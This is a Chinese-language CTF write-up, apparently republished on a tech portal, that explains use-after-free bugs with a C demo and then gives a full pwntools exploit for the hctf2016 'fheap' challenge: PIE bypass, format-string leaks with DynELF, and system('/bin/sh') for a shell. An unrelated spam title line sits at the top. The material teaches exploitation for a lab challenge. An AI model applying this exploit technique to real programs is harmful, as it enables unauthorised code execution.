自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

逆向安全系列:Use After Free漏洞淺析

安全 漏洞
下面主要是用hctf的這道題來給大家講述game利用use after free的原理

[[181787]]

一、前言

想著接下來要寫一個use after free的小總結(jié),剛好碰巧最近的湖湘杯2016的一題----game利用use after free可以解出來。這題是自己***次在比較正式的比賽中做出pwn題,做這題的時間花了不少,效率不高,但自己還是蠻開心的,后面回頭做hctf2016的fheap這題,也可以用uaf解出來,game這題題目的復(fù)雜度稍微高一點,描述起來有點難,下面主要是用hctf的這道題來給大家講述原理。對于uaf漏洞,搜了下,uaf漏洞在瀏覽器中存在很多,有興趣的同學(xué)可以自己去查查。

二、uaf原理

uaf漏洞產(chǎn)生的主要原因是釋放了一個堆塊后,并沒有將該指針置為NULL,這樣導(dǎo)致該指針處于懸空的狀態(tài),同樣被釋放的內(nèi)存如果被惡意構(gòu)造數(shù)據(jù),就有可能會被利用。先上一段代碼給大家一個直觀印象再具體解釋。

  1. #include <stdio.h> 
  2. #include <stdlib.h> 
  3. typedef void (*func_ptr)(char *); 
  4. void evil_fuc(char command[]) 
  5. system(command); 
  6. void echo(char content[]) 
  7. printf("%s",content); 
  8. int main() 
  9. func_ptr *p1=(int*)malloc(4*sizeof(int)); 
  10. printf("malloc addr: %p\n",p1); 
  11. p1[3]=echo; 
  12. p1[3]("hello world\n"); 
  13. free(p1); //在這里free了p1,但并未將p1置空,導(dǎo)致后續(xù)可以再使用p1指針 
  14. p1[3]("hello again\n"); //p1指針未被置空,雖然free了,但仍可使用. 
  15. func_ptr *p2=(int*)malloc(4*sizeof(int));//malloc在free一塊內(nèi)存后,再次申請同樣大小的指針會把剛剛釋放的內(nèi)存分配出來. 
  16. printf("malloc addr: %p\n",p2); 
  17. printf("malloc addr: %p\n",p1);//p2與p1指針指向的內(nèi)存為同一地址 
  18. p2[3]=evil_fuc; //在這里將p1指針里面保存的echo函數(shù)指針覆蓋成為了evil_func指針. 
  19. p1[3]("whoami"); 
  20. return 0; 

這段代碼在32位系統(tǒng)下執(zhí)行。通過這段代碼可以大概將uaf的利用過程小結(jié)為以下過程:

1、申請一段空間,并將其釋放,釋放后并不將指針置為空,因此這個指針仍然可以使用,把這個指針簡稱為p1。

2、申請空間p2,由于malloc分配的過程使得p2指向的空間為剛剛釋放的p1指針的空間,構(gòu)造惡意的數(shù)據(jù)將這段內(nèi)存空間布局好,即覆蓋了p1中的數(shù)據(jù)。

3、利用p1,一般多有一個函數(shù)指針,由于之前已使用p2將p1中的數(shù)據(jù)給覆蓋了,所以此時的數(shù)據(jù)既是我們可控制的,即可能存在劫持函數(shù)流的情況。

三、hctf2016--fheap

uaf原理還比較簡單,下面就是具體的實踐了,這個漏洞復(fù)雜一些的話就和double free這些其他的堆的常見利用方法合起來一起出題,具體的可以看bctf2015的freenote。不過fheap這題用uaf直接就解決了。還有就是湖湘杯2016的game題,和fheap基本上是一樣的,這題大家跟出來了的話可以去做下game試下。先介紹fheap的功能。

A、程序功能

http://p9.qhimg.com/t01b46cefd558d1d0a1.png

程序提供的功能比較簡單,總共兩個功能:

1、create string

http://p9.qhimg.com/t013b79188c80312bfa.png

輸入create 后,接著輸入size,后輸入具體的字符串。相關(guān)的數(shù)據(jù)結(jié)構(gòu)則是:先申請0x20字節(jié)的堆塊存儲結(jié)構(gòu),如果輸入的字符串長度大于0xf,則另外申請對應(yīng)長度的空間存儲字符串,否則直接存儲在之前申請的0x20字節(jié)的前16字節(jié)處,在***,會將相關(guān)free函數(shù)的地址存儲在堆存儲結(jié)構(gòu)的后八字節(jié)處。相關(guān)示意圖描繪如下:

程序功能create string

2、delete string

調(diào)用存儲在結(jié)構(gòu)體里的free_func這個指針來釋放堆,由于在釋放以后沒有將指針置空,出現(xiàn)了釋放后仍可利用的現(xiàn)象,即uaf。

delete string

B、查看防護機制

首先查看開啟的安全機制

查看開啟的安全機制

可以看到開啟了PIE,在解題的過程中還需要繞過PIE,PIE是指代碼段的地址也會隨機化,不過低兩位的字節(jié)是固定的,利用這一點我們可以來泄露出程序的地址。

C、利用思路

總思路:首先是利用uaf,利用堆塊之間申請與釋放的步驟,形成對free_func指針的覆蓋。從而達到劫持程序流的目的。具體來說,先申請的是三個字符創(chuàng)小于0xf的堆塊,并將其釋放。此時fastbin中空堆塊的單鏈表結(jié)構(gòu)如下左圖,緊接著再申請一個字符串長度為0x20的字符串,此時,申請出來的堆中的數(shù)據(jù)會如下右圖,此時后面申請出來的堆塊與之前申請出來的1號堆塊為同一內(nèi)存空間,這時候輸入的數(shù)據(jù)就能覆蓋到1號堆塊中的free_func指針,指向我們需要執(zhí)行的函數(shù),隨后再調(diào)用1號堆塊的free_func函數(shù),即實現(xiàn)了劫持函數(shù)流的目的。

利用uaf,利用堆塊之間申請與釋放的步驟

1、繞過PIE,在能劫持函數(shù)流之后,首先是泄露出程序的地址以繞過PIE,具體的方法是將free_func指針的***位覆蓋成"\x2d",變成去執(zhí)行fputs函數(shù),***變成去打印出free_func的地址,從而得到程序的基地址等。

http://p0.qhimg.com/t0103397379eb072246.png

2、泄露system函數(shù)地址,首先有了程序的地址后,可以得到printf函數(shù)的plt地址,從而想辦法在棧中部署數(shù)據(jù),使用格式化字符串打印出我們需要的地址中的內(nèi)容,使用DynELF模塊去泄露地址,具體可以看安全客之前有人寫的一篇文章---借助DynELF實現(xiàn)無libc的漏洞利用小結(jié)。從而泄露出system函數(shù)的地址。

3、執(zhí)行system("/bin/sh")

最終調(diào)用system函數(shù)開啟shell。

D、最終exp

exp最終如下,里面還有部分注釋。

  1. from pwn import * 
  2. from ctypes import * 
  3. DEBUG = 1 
  4. if DEBUG: 
  5.      p = process('./fheap') 
  6. else: 
  7.      r = remote('172.16.4.93', 13025) 
  8. print_plt=0 
  9. def create(size,content): 
  10.     p.recvuntil("quit") 
  11.     p.send("create ") 
  12.     p.recvuntil("size:") 
  13.     p.send(str(size)+'\n') 
  14.     p.recvuntil('str:') 
  15.     p.send(content.ljust(size,'\x00')) 
  16.     p.recvuntil('\n')[:-1] 
  17. def delete(idx): 
  18.    p.recvuntil("quit") 
  19.    p.send("delete "+'\n') 
  20.    p.recvuntil('id:') 
  21.     p.send(str(idx)+'\n') 
  22.     p.recvuntil('sure?:') 
  23.     p.send('yes '+'\n') 
  24. def leak(addr): 
  25.     delete(0) 
  26.     #printf函數(shù)格式化字符串打印第九個參數(shù)地址中的數(shù)據(jù),第九個剛好是輸入addr的位置 
  27.     data='aa%9$s'+'#'*(0x18-len('aa%9$s'))+p64(print_plt) 
  28.     create(0x20,data) 
  29.     p.recvuntil("quit") 
  30.     p.send("delete ") 
  31.     p.recvuntil('id:') 
  32.     p.send(str(1)+'\n') 
  33.     p.recvuntil('sure?:') 
  34.     p.send('yes01234'+p64(addr)) 
  35.     p.recvuntil('aa') 
  36.     data=p.recvuntil('####')[:-4] 
  37.     data += "\x00" 
  38.     return data 
  39. def pwn(): 
  40.     global print_plt 
  41.      create(4,'aa') 
  42.      create(4,'bb') 
  43.     create(4,'cc') 
  44.      delete(2) 
  45.     delete(1) 
  46.     delete(0) 
  47.     #申請三個堆塊,隨后刪除,從而在fastbin鏈表中形成三個空的堆塊 
  48.     #part1 覆蓋到fputs函數(shù),繞過PIE 
  49.     data='a'*0x10+'b'*0x8+'\x2D'+'\x00'#***次覆蓋,泄露出函數(shù)地址。 
  50.     create(0x20,data)#在這里連續(xù)創(chuàng)建兩個堆塊,從而使輸入的data與前面的塊1公用一塊內(nèi)存。 
  51.     delete(1)#這里劫持函數(shù)程序流 
  52.     p.recvuntil('b'*0x8) 
  53.     data=p.recvuntil('1.')[:-2] 
  54.     if len(data)>8: 
  55.         datadata=data[:8] 
  56.     data=u64(data.ljust(8,'\x00'))-0xA000000000000 #這里減掉的數(shù)可能不需要,自行調(diào)整 
  57.      proc_base=data-0xd2d 
  58.     print "proc base",hex(proc_base) 
  59.     print_plt=proc_base+0x9d0 
  60.     print "print plt",hex(print_plt) 
  61.     delete(0) 
  62.     data='a'*0x10+'b'*0x8+'\x2D'+'\x00' 
  63.     create(0x20,data) 
  64.     delete(1) 
  65.     p.recvuntil('b'*0x8) 
  66.     data=p.recvuntil('1.')[:-2] 
  67.     #part2 使用DynELF泄露system函數(shù)地址 
  68.      d = DynELF(leak, proc_base, elf=ELF('./fheap')) 
  69.     system_addr = d.lookup('system', 'libc') 
  70.     print "system_addr:", hex(system_addr) 
  71.      
  72.     #parts 執(zhí)行system函數(shù),開啟shell 
  73.     delete(0) 
  74.     data='/bin/sh;'+'#'*(0x18-len('/bin/sh;'))+p64(system_addr) 
  75.     create(0x20,data) 
  76.     delete(1) 
  77.     p.interactive() 
  78.     #### 
  79.     #利用的方式總結(jié)為 
  80.     #delete(0),將申請出來的堆塊添入到fastbin中 
  81.     #create(0x20,data),連續(xù)申請兩個堆塊,數(shù)據(jù)覆蓋1堆中的free_func指針 
  82.      #delete(1)劫持函數(shù)流,調(diào)用我們覆蓋的指針處的地址 
  83.     ### 
  84.     if __name__ == '__main__': 
  85.             pwn() 

執(zhí)行結(jié)果

四、小結(jié)

我感覺UAF最主要的是,在釋放了堆塊以后沒有將指針置空,后續(xù)過程中內(nèi)存空間數(shù)據(jù)被覆蓋為其他數(shù)據(jù)后,該指針仍然可以正常使用該內(nèi)存,從而導(dǎo)致數(shù)據(jù)的誤用。ctf題中容易碰見的是,釋放的堆塊中原本某個區(qū)域是用來存儲函數(shù)指針的,后面被惡意構(gòu)造的數(shù)據(jù)覆蓋成其他地址實現(xiàn)了劫持函數(shù)流的目的,從而有可能就被pwn掉了。

責(zé)任編輯:趙寧寧 來源: 安全客
相關(guān)推薦

2016-12-19 16:11:31

2019-02-12 09:52:20

Linux安全Windows

2015-08-10 10:04:28

2015-09-18 09:12:08

2019-12-11 10:16:15

數(shù)據(jù)安全隱私保護網(wǎng)絡(luò)安全

2016-10-31 13:52:52

戴爾

2009-03-10 13:18:56

2016-10-24 22:05:22

2009-07-01 20:49:06

2021-02-23 10:43:42

Facebook Ga

2009-05-18 16:45:43

網(wǎng)絡(luò)安全DVLabs研討會

2013-06-06 13:33:17

2013-06-17 11:34:46

LTE技術(shù)華為Digital R

2021-05-06 07:04:35

安全漏洞業(yè)務(wù)

2022-11-24 13:17:43

2013-08-22 15:47:22

2023-12-13 18:33:17

2011-04-06 13:39:18

2015-03-05 15:01:52

2010-10-27 16:19:58

無邊界網(wǎng)絡(luò)架構(gòu)無線產(chǎn)品思科
點贊
收藏

51CTO技術(shù)棧公眾號